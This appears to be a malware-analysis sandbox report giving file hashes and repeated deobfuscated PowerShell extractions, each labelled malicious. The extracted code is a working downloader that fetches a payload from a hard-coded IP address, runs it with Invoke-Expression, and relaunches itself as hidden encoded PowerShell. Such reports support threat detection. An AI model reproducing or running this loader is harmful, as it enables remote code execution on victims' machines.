|
Hash | Hash Value |
|---|---|
| MD5 | 2106ad19ac89d02c6e57cd97e2039dce
|
| Sha1 | 3e7ce589420cc0d7901859fea4fc64a551e1470f
|
| Sha256 | 33d4101dc18a5a6ff3fcaf12b38e6b294bfb3ad188d4dc0a7320690de750af7d
|
| Sha384 | 70d8a09282d25cab37d96e2061b3dea0699ae5d1dabde91ce8912406355ab4bebc27b75240f027edd9670ae453b8f18f
|
| Sha512 | 48adc0c31518037777145e8a955393abf394b2f76b89d34f87a336068c52c78ca4d0e72e687839940753c0b8fe840e22409aedf89bf4432f9b3cd70711c7042b
|
| SSDeep | 12:ZYL+w+RQ/0wuzDB2cd0JNPT6bB4wKAH+LgyaICQZ2MhA9nCEFoI1kD1:ZYL+H2/bul+16bB4v0+LAQ7hAlPqD1
|
| TLSH | 09F005025FB159EACED68146D0454500A45F38693349395135E06E702DCC0FD94360E0
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" Malicious |
2106ad19ac89d02c6e57cd97e2039dce |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious |
2106ad19ac89d02c6e57cd97e2039dce > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious |
2106ad19ac89d02c6e57cd97e2039dce > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://80.253.249.145/F.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious |
2106ad19ac89d02c6e57cd97e2039dce > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |